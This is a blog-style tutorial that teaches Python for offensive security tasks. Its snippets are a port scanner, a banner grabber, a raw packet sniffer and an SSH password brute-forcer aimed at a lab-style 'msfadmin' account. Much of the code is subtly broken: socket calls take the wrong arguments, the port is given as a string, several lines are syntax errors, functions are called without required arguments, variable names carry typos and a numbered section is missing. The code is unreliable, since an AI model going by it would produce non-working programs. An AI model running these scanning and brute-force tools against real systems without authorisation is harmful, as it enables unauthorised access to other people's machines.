Python for Security

Home Python for Security
, Uncategorized

Open the socket package documentation to figure out the purpose of each function that is to be used.

1. Create a Socket connection

import socket

def main():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    host = 'localhost'
    port = '5000'
    result = s.connect_ex(host, port)
    print('Result is {}'.format(result))
    print('it works')
    s.close()

if __name__ == '__main__':
    main()

2. Create a port scanner

import socket
from utils import timefunc

#Build a class to use it in multiple functions.
#In python a function is considered an object and a class declare how to build an object.
#Classes are useful because they help encapsulate information.
#[self]. helps to call objects (global variables and functions)

class Scanner:
    #This function is used for an automatic assignment of attributes to the object
    def __init__(self,ip): 
        self.ip = ip #creating a property for this object
        self.open_ports = [];

    def __repr__(self):
        return 'Scanner: {}'.format(self.ip)

    def scan(self, lowerport, upperport):
        for port in range(lowerport, upperport + 1):
            if self.is_open(port):
                self.add_port(port)

    def is_open(self,port):
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        result = s.connect_ex(self.ip, port)
        #print('Port {}:    {}'.format(port,result))
        s.close()
        return result == 0

    def write(self, filepath):
        openport = map(str, self.open_ports)
        with open(filepath, 'w') as f:
            f.write('\n'.join(openport))
@timefunc
def main()
    ip = '10.0.10.140'
    scanner = Scanner(ip) # Creating an object of class Scanner. remember to create my class with a single attribute which is the IP
    scanner.scan(1,100) # Can be from 1 to 6000 or whatever you want.
    scanner.write('./open_ports')
    #print(scanner.open_ports)

if __name__= '__main__':
    main()

4. Banner reading from open ports

class Grabber:
    
    def __init__(self, ip, port):
        self.ip = ip
        self.port = port
        self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.socket.settimeout(1000) # How many seconds do you wait for the port reading
        self.socket.connect(self.ip, self.port)


    def read(self, length=1024): # Help to obtain information of the port that is open
        return self.socket.recv(length)

    def close(self):
        self.socket.close()


def main():
    grabber = Grabber('10.0.13.231',22)
    print(grabber.read())
    grabber.close()



if __name__ = '__main__':
    main()

5. Combined the two previous classes

from utils import timefunc
from port_scanner import Scanner
from grabber import Grabber

@timefunc
def main():
    ip = '10.0.13.231'
    portfange = (1, 1001)
    scanner = Scanner(ip)
    scanner.scan(*portgrange)
    for port in scanner.open_ports:
        try:
            grabber = Grabber(ip, port)
            print(grabber.read())
            grabber.close()
        except Exception as e:
            print("Error", e)

if __name__ = '__main__':
    main()

6. Brute forcing an SSH connection

import itertools as it
import string
from utils import timefunc

import paramiko

def create_client(ip, username, password):
    client = paramiko.SSHClient()
    client_policy = paramiko.AutoAddPolicy()
    client.set_missing_host_key_policy(client_policy)
    return client


class Brutes:
    def __init__(self, charset, length, ip):
        self.charset = charset
        self.length = length
        self.ip = ip

    @timefunc
    def crackit(self, username):
        client = create_client()
        for guess in self.guesses:
            try:
                # note: timeout is time to check.
                client.connect(self.ip, username = username, password = guess, timeout = 0.5)
                print('the password is {}'.format(guess))
                return guess
            except paramiko.authenticationException as e:
                print('{} is not it'.format(guess))
            finally:
                client.close()


    @property
    def guesses(self):
        for guess in it.product(self.charset, repeat=self.length):
            yield ''.join(guess)

    @timefunc
def main():
    #charset = string.ascii_letters + string.digits
    #charset = string.ascii_lowercase
    charset = 'aspeb'#'pqrstuvwxyzabcdefghijklmno'
    ip = '10.1.13.231'
    brute = Brutes(charset, 4, ip)
    password = brute.crackit(username= 'msfadmin')
    if password:
        print('found {}'.format(password))


if __name__== '__main__':
    main()

7. Packet sniffing in python

Note: It is assumed that you are in and you are a root user permissions.

import socket

def main():
    conn = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.ntohs(3))
    while True:
        raw_data, addr = conn.recvfrom(65500)
        print(raw_data)

if __name__== '__main__':
    main()

Note: ping a website address to see returned packets on the tracking screen

Related Articles

CONTACT US

We're not around right now. But you can send us an email and we'll get back to you, asap.

Sending

Log in with your credentials

Forgot your details?